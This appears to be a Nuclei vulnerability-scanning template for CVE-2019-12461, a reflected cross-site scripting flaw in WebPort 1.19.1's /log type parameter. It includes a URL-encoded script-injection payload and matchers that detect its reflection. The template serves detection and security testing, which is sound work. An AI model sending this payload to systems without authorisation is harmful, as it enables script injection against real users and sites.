43 lines
1.2 KiB
YAML
43 lines
1.2 KiB
YAML
id: CVE-2019-12461
|
|
|
|
info:
|
|
name: WebPort 1.19.1 - Cross-Site Scripting
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter.
|
|
reference:
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
|
|
- https://webport.se/nedladdningar/
|
|
- https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/
|
|
- https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-12461
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-12461
|
|
cwe-id: CWE-79
|
|
tags: cve,cve2019,xss
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- '"</script><script>alert(document.domain);</script><script>'
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header
|
|
|
|
# Enhanced by mp on 2022/08/08
|